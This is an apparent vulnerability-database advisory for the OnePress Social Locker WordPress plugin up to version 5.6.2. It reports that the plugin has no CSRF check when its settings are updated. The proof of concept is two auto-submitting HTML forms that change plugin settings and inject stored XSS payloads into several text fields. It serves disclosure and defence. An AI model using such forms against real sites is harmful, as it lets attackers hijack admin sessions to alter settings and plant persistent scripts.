WordPress Plugin Vulnerabilities
OnePress Social Locker <= 5.6.2 - Arbitrary Settings Update via CSRF
Description
The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
Proof of Concept
<form id="test" action="https://example.com/wp-admin/edit.php?post_type=opanda-item&page=settings-bizpanda&opanda_screen=terms" method="POST"> <input type="text" name="terms_enabled_is_active" value="1"> <input type="text" name="opanda_terms_enabled" value="1"> <input type="text" name="privacy_enabled_is_active" value="1"> <input type="text" name="opanda_privacy_enabled" value="1"> <input type="text" name="terms_use_pages_is_active" value="1"> <input type="text" name="terms_of_use_text_is_active" value="1"> <textarea name="opanda_terms_of_use_text"><img src=x onerror=alert(1)></textarea> <input type="text" name="privacy_policy_text_is_active" value="1"> <textarea name="opanda_privacy_policy_text"><img src=x onerror=alert(1)></textarea> <input type="text" name="terms_of_use_page_is_active" value="1"> <input type="text" name="opanda_terms_of_use_page" value="80"> <input type="text" name="privacy_policy_page_is_active" value="1"> <input type="text" name="opanda_privacy_policy_page" value="80"> <input type="text" name="save-action" value="Save Changes"> </form> <script> document.getElementById("test").submit(); </script> <form id="test" action="https://example.com/wp-admin/edit.php?post_type=opanda-item&page=settings-bizpanda&opanda_screen=lock" method="POST"> <input type="text" name="debug_is_active" value="1"> <input type="text" name="passcode_is_active" value="1"> <input type="text" name="opanda_passcode" value="1234"> <input type="text" name="permanent_passcode_is_active" value="1"> <input type="text" name="interrelation_is_active" value="1"> <input type="text" name="in_app_browsers_is_active" value="1"> <input type="text" name="opanda_in_app_browsers" value="visible_with_warning"> <input type="text" name="in_app_browsers_warning_is_active" value="1"> <input type="text" name="opanda_in_app_browsers_warning" value="You are viewing this page in the {browser}. The locker may work incorrectly in this browser. Please open this page in a standard browser."> <input type="text" name="adblock_is_active" value="1"> <input type="text" name="opanda_adblock" value="show_error"> <input type="text" name="adblock_error_is_active" value="1"> <textarea name="opanda_adblock_error"><img src=x onerror=alert(1)></textarea> <input type="text" name="rss_is_active" value="1"> <input type="text" name="actual_urls_is_active" value="1"> <input type="text" name="session_duration_is_active" value="1"> <input type="text" name="opanda_session_duration" value="900"> <input type="text" name="session_freezing_is_active" value="1"> <input type="text" name="normalize_markup_is_active" value="1"> <input type="text" name="dynamic_theme_is_active" value="1"> <input type="text" name="managed_hook_is_active" value="1"> <input type="text" name="opanda_managed_hook" value=""> <input type="text" name="alt_overlap_mode_is_active" value="1"> <input type="text" name="opanda_alt_overlap_mode" value="transparence"> <input type="text" name="content_visibility_is_active" value="1"> <input type="text" name="opanda_content_visibility" value="auto"> <input type="text" name="tumbler_is_active" value="1"> <input type="text" name="timeout_is_active" value="1"> <input type="text" name="opanda_timeout" value="20000"> <input type="text" name="save-action" value="Save Changes"> </form> <script> document.getElementById("test").submit(); </script>
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-05-18 (about 2 years ago)
Added
2022-05-18 (about 2 years ago)
Last Updated
2023-02-10 (about 1 years ago)